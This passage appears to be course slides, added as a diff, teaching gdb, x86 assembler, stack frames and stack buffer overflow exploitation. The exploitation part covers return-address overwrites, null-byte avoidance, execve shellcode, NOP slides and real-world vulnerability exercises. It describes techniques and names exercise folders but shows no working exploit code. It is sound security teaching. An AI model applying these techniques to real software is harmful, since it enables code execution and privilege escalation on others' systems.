Program: Debug Symbols +--------------------------------------------------------------- + +[role="incremental"] +* To make any sense of a binary program 'gdb' needs the _debug + symbols_ associated with it. +* These symbols basically define which identifiers (e.g. function and variable + names) exist, what their types are and where they can be found in the + executable and therefore in program memory. +* Because these symbols are rather large (a lot of additional strings) they're + not kept in the final binary program installed on a Linux distribution. + They're _stripped_ off the binary. +* When actively developing a program then you can simply pass the `-g` switch + to 'gcc' or 'g++' to have it generate debug symbols and store them in the + resulting binary. +* When trying to debug an existing program from the Linux distribution then + you will need to install a separate _debuginfo_ package that contains the + debug symbols for each binary of a package in a separate file. +* The debug symbols always need to exactly match the binary to be debugged. + Even if you compile the same source code twice, the resulting debug symbols + aren't usually fully compatible with each other. It is difficult to + identically reproduce a binary program (e.g. due to timestamps). +* Debug symbols can include a checksum to detect mismatches between binary + and debug symbols. +* Side note: There is an effort to achieve `reproducible builds` of programs + which also allows to verify the correctness and trustworthyness of the + binaries in a distribution independently. + + +Preparations for Debugging a C/C++ based Program: Debug Source +-------------------------------------------------------------- + +[role="incremental"] +* For the debugger to be able to display the current location in the source + code that matches the current program state it needs to have the original + source available that was used to compile the binary. +* The paths to the source code are also encoded in the debug symbol + information. 'gdb' will try to lookup the source code in the file system + based on this information. +* Similarly to the _debuginfo_ packages there exist _debugsource_ packages + that contain just the source code of the original package. +* Using the `directory ` command of gdb you can also specify one or more + additional directories where 'gdb' will look for the source files. +* It is possible to use 'gdb' without having the source files around. This + still allows to see for example the backtrace of a program. +* More recent versions of 'gdb' on openSUSE Tumbleweed now offer a mechanism to + automatically download required debug symbols from a remote server. These + debug symbols are then stored in the home directory of the calling user. +* It can still make sense to explicitly install debuginfo packages to avoid + duplication when debugging is done on different user accounts, or to avoid + (possibly slow, or error prone) network accesses while debugging. + +In Practice: Setting up the Debug Environment and Invoking 'gdb' +---------------------------------------------------------------- + +* We will learn how to debug a small test program and also how to debug an + existing program in the distribution. +* *Hands-on*: see example folder 'gdb_intro'. + +General `gdb` Shell Behaviour +----------------------------- + +[role="incremental"] +* The `gdb` shell uses a concept to look for a matching prefix of a command + and accepts it if it is unique. For example `r`, `ru` and `run` are all + recognized as the `run` command. +* You can use tab completion like in the `bash` shell to complete commands and + get a list of supported commands. +* The `help` command can be used for a simple online documentation of existing + commands. + +Basic `gdb` Commands: Controlling the Program Flow +-------------------------------------------------- + +[role="incremental",width="75%",options="header",align="center"] +|==================================================== +^|Command ^| Description +|r[un] [parameters] | Starts the current program from the beginning, optionally passing parameters +|start [parameters] | Like `run` but automatically stops the program in `main()` +|q[uit] | Exit the debugger +|b[reak] [location] | Insert a breakpoint where to stop program execution either at the current location, based on a function name (`b main`) or a source code location (`b gdbtest.c:10`) +|info br[eakpoints] | Shows currently active breakpoints +|enable [number] | Enable a breakpoint +|disable [number] | Disable a breakpoint +|delete [number] | Remove a breakpoint +|c[ontinue] [count] | Continue program execution until a stop event occurs, optionally skipping a breakpoint `count` times. +|n[ext] [count] | Continue execution until the next source code line +|s[tep] [count] | Like `next` but if a function is executed, enter it (step-in) +|u[ntil] [location] | Continue *past* the current line or (e.g. to skip loops) +|==================================================== + +Basic `gdb` Commands: Inspecting the Program Data +------------------------------------------------- + +[role="incremental",width="75%",options="header",align="center"] +|==================================================== +^|Command ^| Description +|backtrace + +bt| Shows the current function call stack +|select | Select a certain stack frame as numbered in the backtrace +|info threads | Shows the threads belonging to the program +|p[rint] [/fmt] | Print the value of a variable, constant or function address. `/fmt` can be things like `/x` to display numbers in hexadecimal. +|x [/fmt]
| Display memory ranges according to `/fmt` which follows the syntax `/` e.g. `/10c` will print ten ASCII character bytes. +|info registers | Display processor registers +|info locals | Shows all local variables in the current function context +|l[ist] | Shows the source code of the current program location or of a certain function or file +|==================================================== + +`gdb` tui Mode: ncurses Based Windowing +--------------------------------------- + +[role="incremental",width="75%",options="header",align="center"] +* You can start gdb directly in tui mode like this: `gdb -tui [...]`. Or you + can toggle tui mode by using `ctrl-x` followed by `a`. +* You can navigate between windows by using `ctrl-x` follow by `o`. +* You can change the layout using the `layout` command. E.g. `layout asm`. + +Play Around a Bit +----------------- + +With the information so far play around a bit with different contexts to get a +feeling for how `gdb` works. I will answer any questions you may have. + +More Advanced `gdb` Features +---------------------------- + +Just to mention them here are some more advanced forms of `gdb` usage: + +[role="incremental"] +* You can create hardware watchpoints at certain memory locations to have the + program stop when a datum is changed. This is useful if in a complex program + a certain variable is corrupted in ways not well understood. +* Remote debugging: You can start a small program `gdbserver` on a remote + system and control it from a different machine. Typically used for embedded + devices but this approach can also be used to debug the Linux kernel running + in a virtual machine. This can be a bit tricky, the local and remote parts + need to match version wise, otherwise things can break (in my experience). +* Post-mortem analysis: When a program crashes and creates a core dump then + the core dump can be analyzed using `gdb` to see which condition lead to the + program crash. + +Common `gdb` Pitfalls +--------------------- + +[role="incremental"] +* If no checksums are used then `gdb` might use wrong debug symbols for a + program without noticing, resulting in all kind of chaos in the debugger. + For system programs this shouldn't happen, because checksums are used. +* The debugger only **roughly** matches source code lines to machine code. + In complex scenarios `gdb` may not be able to correctly match them. + Especially with well optimized code the execution flow at times seemingly + jumps around wildly in the source code, because the compiler reordered + instructions in the machine code. +* In optimized code the values of certain variables may not be accessible + anymore (**optimized out**). This can be a difficult situation; sometimes + changing into a different program context can make the contents visible. In + the end only a look into the assembler code may make it clear what happened, + which needs a lot of time investment. + +Excursion: Compile vs. Link vs. Runtime +--------------------------------------- + +[role="incremental"] +* What is __compile time__? +[role="incremental"] +** It is the time when the compiler or assembler processes symbolic code and + generates machine code for it. In C programming each source file is a + separate compilation unit from which machine code is generated (object + files). +** Through static analysis the compiler can find errors during compile time + and refuse to generate machine code from it. Errors found during compile + time are "cheap", because the compiler finds the problem for you before + human debugging needs to happen. +* What is __link time__? +[role="incremental"] +** Link time is when the linking stage of a program in the build procedure is + reached. For C programming this means that all the generated machine code + found in object files is merged into an executable program or library. During + this stage addresses might need to be calculated such that e.g. functions can + be called correctly. Data is organized in different sections like constant + data into one section while read/write data in another, code in another and so + on. Beyond the program itself this also includes any external libraries + that the program uses. +** Errors found during link time are already somewhat more expensive, consider + different programmers working together and they have a name clash for a + function or global variable: They will only find out once all machine code + is linked together and the linker complains about a duplicate symbol + definition. +** On Linux with shared libraries there is also "dynamic runtime linking" i.e. + the symbols will only be really resolved once the program runs. This moves + the time when issues are detected even further away. +* What is __runtime__? +[role="incremental"] +** Runtime is when an executable program or library actually runs on a given + system. Errors found during runtime (e.g. segmentation fault or another + fatal process signal) are already pretty expensive. The program might + already be deployed by the end user. Debugging and/or logging needs to be + used to find the cause of the error, a new fixed program or patch has to be + provided. +** Even worse are logical errors during runtime i.e. the program does not + visibly crash but it produces wrong results (e.g. infinite loop, no + operation at all or corrupted/wrong data is produced). + +Stack vs. Heap: Two Different Kinds of Memory Allocation +-------------------------------------------------------- + +For understanding Assembler and buffer overflows we need a good understanding +of low level memory management. In higher level languages there is only +"memory", in C programming we already have to deal more directly with it but +in Assembler there are a lot of dirty details we usually don't see. + +The Heap: Dynamic Memory Allocation +----------------------------------- + +[role="incremental"] +* Holds data that is dynamically allocated via `malloc()`, + `new[]` or similar allocators provided by the programming language. +* Requires quite a complex management by the allocator for not wasting memory + (fragmentation). +* Can change size of allocations within reasonable limits (e.g. `realloc()`). +* Needs to be explicitly `free()`\'d at least in the 'C' language. +* Typically holds the larger part of the data processed by a program like file +contents, databases etc. +* Can allocate memory for amounts of data not known in advance (e.g. playing a + video or displaying an image can require all different amounts of memory + depending on input). +* The actual system call involved is `brk()`. The kernel only hands out a + single block of memory to the process that needs to be split up by the C + library or similar memory management routine. + +The Stack: Automatic Memory Allocation during Program Flow +---------------------------------------------------------- + +[role="incremental"] +* Strictly grows and shrinks linearly, by pushing data on top for the current + function call and popping data after returning from function calls (LIFO - + last in, first out). +* Can only allocate space for objects of known size during compile time (with + a few exceptions e.g. stack based dynamic arrays in 'C99' and newer + standards, or via `alloca()`). +* Objects on the stack cannot change size during runtime. +* The stack only holds local variables for the functions that are currently on + the call stack. E.g. no globally accessible data is (easily) possible here. +* It is rather limited in size and should only be used for small bits of data + like loop variables and _small_ buffers. On Linux each thread gets 8 + Megabytes of stack by default, which is already pretty large compared to + other systems. +* It also holds administrative data concerning the program state for + entering into / returning from functions. +* This mixture of data storage and administrative data is what makes the + stack particularly sensitive to security issues (more on this will follow). +* Function local variables in C (`auto` variables) are placed on the stack (or + in a register). + +What does the Address Space of a User Space Application look like? +------------------------------------------------------------------ + +[role="incremental"] +So what exactly is _User Space_ anyway? + +[role="incremental"] +It is the complement to _Kernel Space_. User Space is a term used to denote +regular applications that run under the kernel's supervision, they are the +"users" of the operating system: + +[role="incremental"] +* User space applications usually can't directly access hardware and certain + machine / CPU features. Instead they have to go through the kernel. +* They also only get computation time at the kernel's will (scheduling). +* In contrast kernel threads have arbitrary access to everything in the + machine and can for example easily crash the complete machine if something + goes wrong. +* This kind of memory and resource protection is what makes modern + operating systems much more resilient than (by now) historical operating + systems like DOS. + +What does the Address Space of a User Space Application look like? +------------------------------------------------------------------ + +[role="incremental"] +image::images/addr_space_layout1.png[align="center"] + +What does the Address Space of a User Space Application look like? +------------------------------------------------------------------ + +image::images/addr_space_layout2.png[align="center"] + +What does the Address Space of a User Space Application look like? +------------------------------------------------------------------ + +image::images/addr_space_layout3.png[align="center"] + +[role="incremental"] +* So the memory a userspace process "is seeing" is configurable by software + (via the MMU) during runtime. +* This allows that each process can access certain data at defined locations + while the actual memory behind those locations is unique for each process. + The address `0x2750_e000` can e.g. point to the process's heap for each + process in the system. So the address is the same but the memory behind it + is different for each process. +* Note: Even in the kernel, virtual addresses are increasingly used in some + areas (e.g. `CONFIG_VMAP_STACK`), this figure here is just a basic model. + +Looking at the Address Space of a Sample Application +---------------------------------------------------- + +* Let's examine the different memory reagions in a simple C program. +* *Hands-on*: see example folder 'address_space_basics' + +About Processor Bit Width +------------------------- + +When we talk about 32-bit or 64-bit CPUs then this is a bit fuzzy sometimes +what it entails. + +[role="incremental"] +At the core it refers to the width (word size) of the registers in a CPU: + +[role="incremental"] +* 32-Bit CPUs have 32 bits in each register, thus being able to represent + unsigned numbers of up to 2^32^ - 1. +* 64-Bit CPUs correspondingly can store 64 bits in each register and thus + unsigned integers of up to 2^64^ - 1. + +The Maximum Extent of the Address Space +--------------------------------------- + +[role="incremental"] +Since registers are also used to hold pointers to memory locations, the width +of the registers also somewhat (but not necessarily directly) relates to the +maximum amount of memory that can be addressed. + +[role="incremental"] +On 32-Bit x86 this means that up to 4 Gigabyte of memory can be addressed. +This does not only cover actual RAM but also other hardware devices and +objects that are represented in the address space. There are extensions in +newer 32-Bit processors that allow larger amounts of memory to be addressed +though. Also the 286 processor and some other older processor architectures +support addressing more memory by using different techniques e.g. a view into +different sections (segments) of memory that is controlled via an index that +needs to be managed by the OS and/or applications. Due to backward +compatibility modern AMD64 CPUs still support the modes used for this on an +8086 or 286 processor. + +[role="incremental"] +On AMD64 theoretically the large address space of up to 2^64^ - 1 bytes can be +used. Since this is not currently needed in practice, the processors actually +only support up to 48 bits (256 Terabytes) to be used for addressing. The +upper 16 bits always need to be zero, when specifying addresses. + +Assembler: Introduction +----------------------- + +[role="incremental"] +Soon we want to have a look at the low level details of a program's stack +handling. For this we will require some basic understanding of Assembler. In +this part of the training we will get to know the _basics_ of Assembler - so +far that we can understand how the stack memory management works on the lowest +level. + +[role="incremental"] +So what is Assembler exactly? +[role="incremental"] +* It is the thinnest programming layer to write a program. It basically makes + just the plain CPU instructions more digestible by giving them names, + instead of just plain numbers (which are actually found in the raw machine + code). +* The assembler (like a rather simple compiler) translates the assembler + language into machine code. It performs a couple of sanity checks for each + instruction to avoid obvious inconcistencies. +* Each assembler instruction directly translates into one machine instruction. +* On assembler level there is no abstraction of the CPU architecture. Thus the + assembler code needs to be specific to the processor architecture. It looks + very different for 'arm' compared to 'x86' compared to 'powerpc' etc. +[role="incremental"] +Understanding assembler code is way more difficult than understanding a C +program, because it is much larger than an equivalent C program and much less +descriptive. +[role="incremental"] +With the time we have in this training we can still only scratch the surface +of Assembler programming. You should try to get a feeling for how it works and +what the concepts are. But you don't need to remember each instruction or +register involved. + +Assembler: The Basic Registers of the x86 CPU +--------------------------------------------- + +=== What is a register? + +[role="incremental"] +A register is a very small but very fast type of memory that is an integral +part of the CPU. Each register has a designated name and some also have a +special purpose. Most registers can store one "word" i.e. the basic word size +of a processor which is 32-bit for an i386 based CPU and 64-bit for an AMD64 +based CPU. Most calculations can only happen in registers so the processor +needs to load data from system memory into registers, operate on it, and +store results back into system memory. + +[role="incremental"] +The following table gives an overview of the most important registers on PC +architectures. + +// E is for extended, R is - it seems - just for "register" + +[role="incremental",width="75%",options="header",align="center"] +|==================================================== +^|i386 (32-bit) footnote:[the E prefix is for 'extended'] ^| x86_64 (64-bit) footnote:[the R prefix is for 'register'] ^| Description +|ebp | rbp | stack base pointer, where the current stack frame starts +|esp | rsp | stack top pointer, here new function local data can be placed +|eip | rip | instruction pointer +|eax, ebx, ecx edx | rax, rbx, ... r8 .. r15 | general purpose data +|==================================================== + +[role="incremental"] +A register does not have a memory address, only its unique name (or number, on +machine code level). + +[role="incremental"] +This shows: The stack concept is not only an operating system / programing +language choice but goes even down to the machine instruction and register +set. + +Assembler: Register Naming Scheme +--------------------------------- + +[role="incremental",width="75%",options="header",align="center"] +|==================================================== +^|i386 (32-bit) footnote:[the E prefix is for 'extended'] ^| x86_64 (64-bit) footnote:[the R prefix is for 'register'] ^| Description +^|eax ^| rax | accumulator +^|ebx ^| rbx | base +^|ecx ^| rcx | count(er) +^|edx ^| rdx | data +^|esi ^| rsi | source index +^|edi ^| rdi | dest index +|==================================================== + +[role="incremental"] +The special meaning of these registers is mostly lost today and therefore on +'x86_64' there have just been added general-purpose registers `r8` to `r15`. +In this context the old school registers can be viewed as `r0` to `r7` but +they're still used with their classical names. + +[role="incremental"] +`rbp` and `rsp` are the only semantic registers that still serve their +purpose. On 32-bit platforms the GCC switch `-fomit-frame-pointer` is +sometimes used to free the rbp register for performance reasons. + +Assembler: Some Basic Instructions +---------------------------------- + +[role="incremental"] +* An instruction is one elementary command to the CPU to process data found in + registers and system memory in some way. +* Following are some of the more important assembler instructions necessary + for understanding the stack handling and later exploit code. + +[role="incremental",options="header",align="center"] +|==================================================== +^|Instruction ^| Description +|`mov` | move data between two registers/memory locations +|`push` | put some data on the stack, advancing %rsp +|`pop` | removes some data from the top of the stack, storing it in a register/memory location, reduces %rsp +|`call` | continues execution at some other function address, puts the current %rip as return address onto the stack +|`ret` | copies `%ebp` to `%esp` and restores old `%ebp` from the stack +|`enter` | pushes `%ebp` onto the stack, copies %esp into `%ebp` +|`leave` | copies `%ebp` to %esp and restores old %ebp from the stack +|`lea` | load effective address, computes the address of the offset from a base pointer e.g. for arrays, e.g. `lea rax, [rbx+8]` would put the address of the pointer in rbx plus an offset of 8 into register `%rax`. +|==================================================== + +// NOTE: hand out individual slides like the register table for better +// understanding on-the-go + +Assembler: AT&T Syntax +---------------------- + +There exist two different Assembler syntaxes for x86 assembler. We are using +'AT&T' syntax while there also exists an 'Intel' syntax. The 'AT&T' syntax is +used in `gdb`, the GNU assembler and other standard Linux utilities. 'Intel' +syntax is more popular in the Windows world. 'AT&T' syntax has the following +basic rules: + +[role="incremental"] +* Registers are prefixed with a `%` sign like `%rax`. +* 'immediate' values (constants) are prefixed with a `$` sign like + `$10`. +* In move operations the transfer source is the first parameter, the transfer + target is the second: `mov %rbx %rax` will copy the contents of the `rbx` + register into the `rax` register (think: move from ... to ...). +* Addressing offsets (pointer dereferences) are specified like this: `mov + -8(%ebp), %rax`. This would + copy a 32-bit value located eight bytes from the current stack frame into + `rax`. +* Especially for addressing and pointer handling there exists more complex + syntax that we won't study in detail here. + +Excursion: System Calls +----------------------- + +=== What is the difference between a library or function call and a system call? + +[role="incremental"] +* A library or local function call is a purely userspace operation, no change +of privilege takes place. Execution jumps from one piece of program code to +another. +* A system call is a request to the operating system kernel (in our case: the +Linux kernel) to perform a certain task on behalf of our program. Practically +all file operations and I/O, starting new programs, networking etc. can only +be accessed by way of the kernel. +* We need to differentiate between system call wrappers, which are function +calls in glibc, and the actual system call. In man pages this is separated in +section 2 like `man 2 exit` for system calls and section 3 like `man 3 exit` +or `man 3p exit` for libc / posix library calls. A popular example is `man 2 +clone` vs. `man 3p fork`. +* For regular function calls the compiler is free to organize the passing of +parameters any way it wants. Before executing a system call, however, all +necessary parameters for the system call need to be placed into registers in +the correct order, according to documentation (interface contract). +* On i386 Linux a system call is triggered via software interrupt `0x80`. +This approach is still supported on x86_64, but only for 32-bit emulation and +values larger than 32 bits cannot be passed to the kernel this way. So this may +cause strange behaviour if passing large pointers for example. +* On x86_64 Linux a system call is triggered via a dedicated `syscall` +processor instruction. +* During the system call, control is transferred to the kernel and the kernel +code inspects the parameters, whether the requesting process is permitted to +do what it asks for and on success performs the requested operation. +* After the system call is complete any output / return parameters are placed +into registers or userspace memory depending on the system call contract and +control is returned back to the userspace program to continue working. +* Knowing about this is also interesting for performance reasons. System calls +are rather expensive compared to function calls and the amount of them should +be minimized. + +Assembler: System Call Conventions +---------------------------------- + +A quick look onto the conventions for system call parameter passing on 'i386' +and 'x86_64'. + +[cols="h,2*",width="75%",options="header",align="center"] +|==================================================== +| ^| i386 ^| x86_64 +| System Call Instruction | `int 0x80` | `syscall` +| System Call Nr. Register| `%eax` | `%rax` +| Parameter Registers + (ordered) | `%ebx, %ecx, %edx, %esi, %edi, %ebp` + | `%rdi, %rsi, %rdx, %r10, %r8, %r9` +|==================================================== + +The system call numbers differ between i386 and x86_64 and can be found in +'/usr/include/asm-x86/unistd_{32,64}.h'. + +Assembler: A Hello World Program +--------------------------------- + +* With what we know so far we will finally write a small standalone assembler + program. +* *Hands-on*: see example folder 'as_intro'. + +Assembler: Register Addressing Modes +------------------------------------ + +Because of the history of the x86 architecture which started out with 16 bits +on the 8086 and currently is at 64 bits on 'x86_64' - and for easier/more +compact coding - we can access each register with different bit widths. + +[role="incremental"] +The following table shows the relation of the differently named registers. 1 +.. 8 denote the bytes from low to high order of a single register. + +[role="incremental"] +[width="85%",align="center",halign="center",valign="middle"] +|==================================================== +|8|7|6|5|4|3|2|1|Comment +8+|*64-Bit*| +8+| `rax, rbx, rcx, ...`| x86_64 only, 'r' for register +4+| 4+| *32-Bit*| +4+| 4+| `eax, ebx, ecx, ...`| "extended" +6+| 2+| *16-Bit*| +6+| 2+| `ax, bx, cx, ...`| 'x' is historical +6+| | *8-Bit* | *8-Bit*| +6+| | `ah, bh, ch, ...` | `al, bl, cl, ...` | high, low +//|ax, bx, ... | lower 16-bit width part of eax/rax, ebx/rbx etc. +//|ah/al, bh/bl | high and low 8-bits of the lower 16-bits of eax/rax, ebx/rbx etc. +|==================================================== + +Assembler: Instruction Width Suffixes +------------------------------------- + +Most assembler instructions can operate on different register widths by +appending a suffix. An example for the `mov` instruction, copying the constant +(also called immediate value) zero into the first register. + +[width="75%",options="header",align="center"] +|==================================================== +|Instruction | Width +|`movq $0 %rax` | 64-Bit (__quad__) +|`movl $0 %eax` | 32-Bit (__long__) +|`movw $0 %ax` | 16-Bit (__word__) +|`movb $0 %al` | 8-Bit (__byte__) +|==================================================== + +[role="incremental"] +When an instruction like `mov` is used without suffix then the Assembler +assumes the full register size. But this is not always unambiguous when e.g. +immediate values are involved, so in those cases an explicit width suffix +needs to be specified. + +[role="incremental"] +**Note:** The term "word" can be ambiguous, because on hardware and software +level it has been used in the past refering to the basic register width of the +first processor generation it was designed for. E.g. in the Microsoft WIN32 +system programming API a WORD is still 16 bits while a DWORD is 32 bits +("double"). + +[role="incremental"] +On a more abstract level a processor word is the canonical data width it +is operating with i.e. the width of general purpose registers and thus different +between a 286, 386 and AMD64 processor. + +About Processor Architectures +----------------------------- + +[role="incremental"] +The following discussion focuses on 'i386' / 'x86_64' architectures. Other +architectures may differ but should basically employ the same concepts. I'll +refer to 32 Bit x86 processors as 'i386' for differentiation, although most +modern 32-Bit Linux distributions are optimized for 'i586' or 'i686' already. + +[role="incremental"] +On 32-Bit x86 processors there are only 8 general purpose registers available. +Thus registers are a precious resource and organizing them efficiently was +very important on the PC. This processor architecture has been infamous even +in its infancy for its complexity, other processors (Motorola 68k) already had +up to 16 registers and the upcoming RISC processors starting around the year +1990 (MIPS, Sparc) already had up to 32 registers. + +[role="incremental"] +More registers do not necessarily mean everything is better. It also has its +downsides, the processor becomes more complex and context changes (entering +system calls, switching between the execution of different programs) can slow +down. + +[role="incremental"] +On 'x86_64' the processor finally has 16 general purpose registers and the +pressure to manage them efficiently is reduced a lot. The complexity +of the 32-bit mode remains but the 64-bit mode is more cleanly organized. + +About Functions Calls +--------------------- + +[role="incremental"] +* What is the purpose of a function in programming languages? +[role="incremental"] +** Separating complex programs into smaller, better manageable pieces. +** Reusing code that would otherwise have to be duplicated. +** Offering clear interfaces for dedicated purposes. +* What needs to be taken care of when a function call happens? +[role="incremental"] +** The input parameters need to be passed to the function's code according to + a compiler or programming language specific contract. +** The output parameters need to be returned to the caller of the function in + a similar way after the function execution has finished. +** Certain state of the program / processor before the function call happened + needs to be saved and restored after the function call has finished. +* What is a call stack? +** It is the series of function calls that are active at a given time at + program execution. It is what you see when you enter 'bt' in `gdb`. + +How is the Stack Organized? +--------------------------- + +[role="incremental"] +* A function call needs to be generic enough such that it works no matter from + where in the program and in which program state it is called. +* For each function call that is performed, a _stack frame_ is setup + that holds all the local variables and possibly input parameters passed to + the function. +* This also includes additional administrative information required to return + to the original function correctly. +* Thus a stack frame is a memory area on the stack that belongs to a + specific function call while it is executing. + +Stack Frame Layout and Management +--------------------------------- + +image::images/stack_frame1.png[align="center"] + +Stack Frame Layout and Management +--------------------------------- + +image::images/stack_frame2.png[align="center"] + +Stack Frame Layout and Management +--------------------------------- + +image::images/stack_frame3.png[align="center"] + +Stack Frame Layout and Management +--------------------------------- + +image::images/stack_frame4.png[align="center"] + +[role="incremental"] +Note: Remember that the stack memory area grows downwards! + +Implementing a Function Call in Assembler +----------------------------------------- + +* After this theory on stack handling we'll have a look at how to implement + our own function call in Assembler. +* *Hands-on*: See example folder 'as_stack'. + +Looking at the Stack Frame Disassembly of a Sample Program +---------------------------------------------------------- + +* We'll examine a practical example with a simple C program. +* *Hands-on*: See example folder 'stack_frame'. + +Some Hints Regarding Assembler +------------------------------ + +[role="incremental"] +* Assembler is __highly CPU and OS specific__ and even differs between i386 / +x86_64, because of differently named instructions, register sizes etc. +* When disassembling code that was compiled with __optimizations__ then it +will be considerably more difficult to understand what is going on, because +the compiler reorders instructions, removes instructions and changes the way +parameters are passed to functions and so on. There are also compiler switches +like `-fomit-frame-pointer`. +* For x86 CPUs there are two different __styles of assembly__ notation called AT&T +and Intel style. One of the main differences is the order in which registers +are written down: AT&T style shows the source register first, Intel style +shows the target register first. On Linux ('gcc', 'gdb') AT&T style is mostly +used. +* Depending on OS, CPU and sometimes also on the compiler different +__calling conventions__ exist. These conventions define in which way +parameters are passed to functions, how the stack frame is organized, what the +caller needs to do and what the callee needs to do. Sometimes / some parts of +these conventions are defined by the CPU design, sometimes / some parts by +operating system developers etc. If calling conventions don't match +between different functions then trouble is ahead (for example: Microsoft +Windows allows switching between `fastcall` and `stdcall`). +* If functions are declared `static` and are thereby locally defined in a +compilation unit then the compiler can perform more agressive optimizations, +because it knows of all callers and callees and can make assumptions that +wouldn't be possible if a function is exported e.g. for use in a dynamically +loaded library. This can for example allow to relax the requirements to backup +and restore register contents. A more modern approach is called __link time +optimization__ (lto) that performs optimizations during link time when all +callers from all object files are known (only works for static linking, not +for functions exported by shared libraries). + +Typical Stack Overflow Vulnerabilities +-------------------------------------- + +[role="incremental"] +* What can happen when we overflow a stack-based buffer into the stack frame + management data? +[role="incremental"] +** Naturally we can crash the program easily by writing bad addresses for +stack pointer, return address, or function specific parameter values. +** More interestingly we can attempt to replace the return address with a +completely different function or code portion and thus achieve completely new +program behaviour. + +Working with Binary Snippets: The exit System Call +-------------------------------------------------- + +* In this example we will learn how to extract a piece of machine code from a + binary and repurpose it. +* For this example you will need need to install the `execstack` package to + successfully build it. +* *Hands-on*: this is example folder `exit_snippet`. + +Example 1: Parameter Injection +------------------------------ + +[role="incremental"] +* We'll examine a practical example of a program that doesn't handle its stack +buffer well. +* *Hands-on*: See example folder `param_injection`. +* Can you find the problem? +* What's an easy way to exploit it? + +Example 2: Replacing the Return Address +--------------------------------------- + +[role="incremental"] +* The previous example showed how to modify the parameters that existing code +works with but the basic code flow remained unchanged. +* This time we want to change the code location that is returned to after the +function call finishes. +* *Hands-on*: See example folder `zombie_call`. +* How might we find out the correct location of the return address on +the stack relative to the overflowing buffer, in a black-box approach? +* NOTE: the stack addresses presented when running GDB vary slightly from the +addresses a program uses when running outside of gdb. This is because gdb adds +some environment variables which are not normally there. This shifts addresses +by a couple of bytes. Attaching to a program with gdb after it was normally +started should yield the regular stack addresses. + +Trouble with Terminators +------------------------ + +[role="incremental"] +* Many stack overflows occur in typical unbounded C string functions like +`strcpy()`, `scanf()` or the evil `gets()`. +* What might be a limitation when we're overflowing a stack based buffer in these +cases? +[role="incremental"] +** The problem is when any `'\0'` byte is included in the code or addresses +that we want to execute then it is not copied completely over into the target +buffer. +** The same goes for `'\n'` for line based functions like `gets()`. +** Or any whitespace characters in case of `scanf("%s", ...)`. +* To get around this limitation we might need to rewrite some assembler +statements in a way that avoids the terminating bytes. +* For this the bare CPU instructions need to be checked whether they contain +any of the problematic bytes and look for equivalent command sequences +that avoid having to put the bytes in question into the code sequence. +* Example: replacing __mov $0 %rax__ by __xorq %rax %rax__ avoids any null +bytes but achieves the same result of getting the value of 0 into `%rax`. + +// hint that there have even been concepts like putting the C library into an +// address space that always contained a null byte + +Exploiting the Stack Machinery +------------------------------ + +We've seen how the stack works and that it is a sensitive area when buffer +boundaries are not enforced correctly. To execute arbitrary code we now +need to find ways to exploit the way the stack works to our advantage, using +the available CPU instructions and properties of the vulnerability. + +Example 2: The execve System Call +--------------------------------- + +[role="incremental"] +* What an attacker typically wants to achieve with a stack buffer overflow exploit +is starting some other program with the elevated privileges of the vulnerable program +(think of __setuid__ binaries) or start a reverse shell that accepts additional +commands from the network. +* An important system call in this regard is `execve()`. +* This is a more complex system call that requires string and string-array +parameters for setting it up correctly. +* We need to take some more precautions for constructing a piece of self +contained machine code suitable for overflowing the stack and calling +something like __/bin/sh__ via the `execve()` system call. +* *Hands-on*: We'll look into example folder `exec_snippet` for this. + +Finding the Right Return Address +-------------------------------- + +[role="incremental"] +* We now know how to construct a piece of self-contained code that will do +what we want (calling __/bin/sh__). But how can we cause it to be executed? +* We need to overflow a return address onto the stack that hits exactly the +beginning of our injected code. +* Although we roughly know where the stack starts, we can't be sure. So we'd +need to run many attempts to hit the right address. +* We can help ourselves with a technique known as __NOP slide__: +[role="incremental"] +** A NOP (no operation) instruction is a valid CPU instruction that +effectively does nothing. +** By prepending the actual payload code with extra NOP instructions we get a +range of addresses that are all suitable for finally executing our exploit +code. + +Structure of the Overflow Payload +--------------------------------- + +image::images/overflow_structure.png[align="center"] + + +Setting Arbitrary Code Execution into Motion +-------------------------------------------- + +* With everything we know now we can try our luck to execute our `execve()` +code in a vulnerable program. +* *Hands-on*: This is example folder `code_injection`. + +Real-Life Examples +------------------ + +We will look into one or two of the following real world vulnerabilities: + +[role="incremental"] +=== libsoup (2017) + +* A possible remote code execution via http requests +* *Hands-on*: In the example folder `soupstrike` you can find some helper +script and documentation about a real-life stack overflow example that was +found in Gnome's 'libsoup', an http protocol parsing library, some years ago. + +[role="incremental"] +=== chocolate-doom (2020) + +* A *nearly* possible remote code execution when a network game server accepts + new clients. It is still interesting for studying. +* *Hands-on*: In the example folder `buffer_doom` you can find some + helper script and documentation about a real-life stack overflow example + that was found in the 'doom' OSS port. + +[role="incremental"] +=== connman (2021) + +* A remote code execution in the DNS reverse proxy component of the connman + network manager. +* A pretty complex but interesting real-world example of a remote stack buffer + overflow. +* *Hands-on*: In the example folder `connman_dns` further instructions and helpers + can be found. + +[role="incremental"] +=== htmldoc (2021) + +* `htmldoc` is documentation tool to convert HTML to formats like PDF. +* It is an example of badly implemented media format parsing that could be + used to attack via mail attachments or social engineering. +* *Hands-on*: In the example folder `doc2exploit` further instructions and + helpers can be found. + +[[stack-overread]] +Stack Buffer Overread +--------------------- + +[role="incremental"] +* So far we've looked at the worst case of a stack buffer write overflow which +might allow an attacker to execute arbitrary code or gain privileges. +* But what if there's a vulnerability that only allows to read content from +the stack? Which types of vulnerabilities do you see here? +* *Hands-on*: See example folder `stack_overread`. +[role="incremental"] +** The exposed information from the stack frame can help finding out where +exactly the stack is located. When combined with a write overflow in some +other code location this can greatly increase our chances of success trying to +exploit the latter. +** It may also expose further addresses of interesting local parameters and +arguments that we might use in exploit code. +** In the worst case, sensitive information on the stack may be exposed, like +cleartext passwords, data read in from root-owned files ... + +Undefined Data on the Stack +--------------------------- + +[role="incremental"] +* In C programming, when a variable is put on the stack and not immediately + initialized then it contains undefined data (i.e. it is usually not zero + initialized automatically). +* What this means is that typically some seemingly random or garbage data, or, + more accurately, data from former stack frames is found in the variables. +* To see what kind of bad things can happen with this let's have another + *Hands-on*: See example folder `uninitialized_data`. + +Not Leaving Sensitive Data Behind: A Difficult Task +--------------------------------------------------- + +[role="incremental"] +* Initialization of buffers and variables before using them is good practice +and works well in most situations. This protects against accidental leakage of +data from other parts of the program. For small data like integers this is +also no big performance impact. For large buffers special care has to be +taken if performance matters. +* It would generally be desirable to wipe out any critical data like +passwords, cryptographic keys, random data etc. right after it has been used. +* In managed programming languages that use a garbage collector and smart +memory management (Java, Python, ...) it is very difficult to do this, because +the programmer has little knowledge or even control over the way the data is +handled on the 